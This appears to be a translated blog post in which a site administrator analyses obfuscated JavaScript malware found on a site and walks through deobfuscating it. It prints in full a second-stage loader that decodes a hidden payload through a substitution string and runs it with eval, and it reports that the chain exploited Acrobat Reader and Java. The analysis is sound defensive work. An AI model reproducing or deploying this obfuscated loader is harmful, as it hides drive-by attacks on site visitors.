Javascript malware identification

On one site, a strange code was found on the support in js, it was more clear that it was malicious: avast issued a warning, and the console showed that there is a connection with several left sites.

How malicious code got to the site is not so important, the alleged hole is already closed, but before finally removing the code, I decided to see what it does.

So, there are three lines of encrypted code, take, for example, the first one .
You can decipher such scripts using various online services, but when I tried to decipher further, I came across a wonderful program that allows you to spend less time on it.

The decrypted script becomes much clearer, which is interesting, the call to the site was made on the event “document.onmousemove”, therefore, most likely, the bot will not detect this script.
')
All three scripts led to sites whose domains were registered in DyDNS , which does not allow tracking this person, which we did not need, but it would be a nice addition.

Ok, now it’s interesting, and what exactly this script loads from the site, it turns out to be another obfuscated js'ka . We already know how to determine the true purpose of the script, and do not find anything interesting in the code : the i-frame is loaded, in which, I thought, everything is simple. However, the server's answer surprised me a lot, it was very unclear what was there . In this I decided to dig through the handles, because the magic program could not help.

Parts of html were also interesting.

<body id="eval"> <input type="text" value="innerHTML" id="bOHYVBO5"> <div id="length" style="visibility:hidden"> 

and scripts

 <script> EPPkAnzs=document; EPPkAnzs.wxdQzk0q=function(shjZdTvV){return EPPkAnzs.getElementById(shjZdTvV);}; EPPkAnzs.Wul6s0M=function(shjZdTvV){return EPPkAnzs["getElementsB@@@@@@@@@@yTagName".replace("@@@@@@@@@@","")](shjZdTvV);}; ZYpi6j9=EPPkAnzs.Wul6s0M("div")[0].id; function SJHTBM(Y7vWZr3R,YCYqLvHz){return Y7vWZr3R.concat(YCYqLvHz);} HALnMi=function(Y7vWZr3R,YCYqLvHz,DiZpr){return Y7vWZr3R.substr(YCYqLvHz,DiZpr);}; qo5mOv=EPPkAnzs.Wul6s0M("div")[1][EPPkAnzs.wxdQzk0q("bOHYVBO5").value]; vOm2xcMs = "Da[-PREfb6)lIN%{c4 V&s>}yJ2?*8!=Yo0+9Zu7_dO$|\\'x<nUAG^]j;M31e/gCtHL5wvKh@\"#W,rpmSFi:zTqBQk(X"; wM16vq=""; lA8KxT38=qo5mOv[ZYpi6j9]; FBVE8K4W=0; i=0; gTjSM=[]; while(FBVE8K4W<lA8KxT38){ gTjSM[i] = HALnMi(qo5mOv,FBVE8K4W,2); FBVE8K4W=2+FBVE8K4W; i++; } i=0; while(i<gTjSM[ZYpi6j9]){ iidteUpd=HALnMi(vOm2xcMs,gTjSM[i],1); wM16vq=SJHTBM(wM16vq,iidteUpd); i++; } </script> <script> if(EPPkAnzs.Wul6s0M("div")[0].id==="length")this[EPPkAnzs.Wul6s0M("body")[0].id](wM16vq);; </script> 

To begin with, I decided to simplify all this, so as not to look at a random collection of letters. The first thing that is asked is to replace “EPPkAnzs” with “document” everywhere, to do the obvious, “getElementsB @@@@@@@@@ yTagName” .replace ("@@@@@@@@@", " ") replace with getElementsByTagName and so on. Then he began to simplify the names of the functions and substitute the necessary values.
The unreadable “qo5mOv = EPPkAnzs.Wul6s0M (" div ") [1] [EPPkAnzs.wxdQzk0q (" bOHYVBO5 "). Value];" turned into understandable “big_text = document.getElementsByTagName (" div ") [1] [" innerHTML "];"
After all these rather simple manipulations, the cunning plotter’s insidious design became obvious, in a cycle he ran over the top piece of numbers, split them into two and took the letter of the corresponding position from the character string. When everything became clear, I just eval'om output the result and formatted it a little.
Running through the script, I saw that Acrobat Reader and Java vulnerabilities were used.

With this, I calmed down and, with a clear conscience, deleted all references to the malware. Check popular plugins for security and update them promptly so you don’t have to arrange such quests.